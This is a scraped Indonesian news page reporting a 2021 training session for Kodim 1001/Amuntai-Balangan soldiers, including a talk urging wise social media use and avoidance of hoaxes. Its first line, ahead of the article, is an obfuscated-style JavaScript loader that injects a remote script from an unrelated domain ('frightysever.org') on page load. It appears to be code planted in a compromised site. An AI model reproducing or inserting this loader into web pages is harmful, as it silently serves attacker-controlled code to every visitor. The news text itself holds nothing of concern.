(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Anggota Kodim 1001/Amuntai Diminta Ajak Masyarakat Bijak Bersosmed


KANALKALIMANTAN.COM, AMUNTAI – Puluhan prajurit Kodim 1001/Amuntai-Balangan mendapat pembekalan dan Pembinaan Kesiapan Aparat Kewilayahan (Binsiap Apwil) dan Kemampuan Teritorial (Puanter) Triwulan II tahun 2021.

Kegiatan yang digelar di Aula Kodim 1001/Amuntai, Senin (14/6/2021), diikuti seluruh Danramil dan perwakilan Babinsa.

Salah satu pemateri dalam giat tersbut adalah Akhmad Ismail selaku Administrator Infrastuktur dan Jaringan Diskominfo Kabupaten HSU.

Kegiatan ini bertujuan meningkatkan kesiapan prajurit dalam pelaksanaan pembinaan dan pemberdayaan wilayah pertahanan di wilayah Kodim 1001/Amuntai-Balangan.

 

“Kegiatan ini sebagai upaya agar dapat menyamakan langkah dan misi para babinsa dalam pengabdian kepada bangsa dan negara melalui tugas pembinaan teretorial di wilayahnya dan terpelihara kemanunggalan TNI dengan rakyat,” jelas Kepala Staf Kodim (Kasdim) Mayor Inf Eko Santoso yang mewakili Dandim 1001/Amuntai Letkol Inf Ali Ahmad Satriyadi.

Kasdim 1001/Amuntai menyampaikan, sosialisasi Binsiap Apwil dan Puanter ini sangat penting agar nantinya bisa lebih memahami tugas dan tanggung jawab. Sehingga tidak terjadi keraguan dalam mengaplikasikan atau melaksanakan tugas di lapangan.

Sebagai pedoman dalam bertugas, ia menegaskan bahwa para prajurit harus meningkatkan iman dan taqwa kepada Tuhan Yang Maha Esa, tetap menjaga protokol kesehatan dalam pelaksanaan kegiatan.

Ditambah lagi dengan meningkatkan serta dapat memelihara kesiapan sebagai aparat wilayah serta mantapkan kemampuan teritorial.

“Tingkatkanlah kemampuan pemberian laporan kepada komando atas agar dapat di tindak lanjuti serta mempelajari kembali materi-materi teritorial dan metode binter,” terangnya.

Sementara itu, Akhmad Ismail dalam materinya menyampaikan untuk dapat bijak dalam penggunaan smartphone, salah satunya bijak dalam penggunaan sosial media.

Ismail berharap informasi yang disampaikan dalam kegiatan ini dapat juga nantinya disampaikan kepada keluarga serta masyarakat yang lebih luas agar masyarakat juga tidak terjerumus dalam berita Hoax, kejahatan Siber dan sebagainya.

Baca juga: Rekapitulasi Suara PSU di Kecamatan Martapura, Saksi H2D Enggan Tanda Tangan

“Mari kita ajak masyarakat menghindari penyebaran konten yang berbau sara pornografi, dan kekerasan. Periksa kembali informasi yang kita terima berasal dari mana sumbernya. Hal ini dikarenakan banyak berita hoaks yang tersebar dimana-mana,” tandasnya.

Disamping materi terkait Perkembangan teknologi & informasi, materi lainnya yang di berikan dalam kegiatan tersebut diantaranya Lima Kemampuan Teritorial oleh Kapten Inf Mahmud Dalli Pasi Ter Kodim 1001/Amuntai, Sikap Teritorial oleh Kapten Inf Ahdi S Pasi Pers Kodim 1001/ Amuntai, Metode Binter oleh Kapten Inf. Eko W Pasi Log Kodim 1001/ Amuntai, serta Pola Sikap dan Perilaku Masyarakat yang ada di wilayah binaan oleh Letda Inf Mulyono Pjs Pasi ops Kodim 1001/ Amuntai (kanalkalimantan.com/dew)

Editor: cell


Risa

Recent Posts

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

6 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

16 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

16 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

17 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

18 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

19 jam ago

This website uses cookies.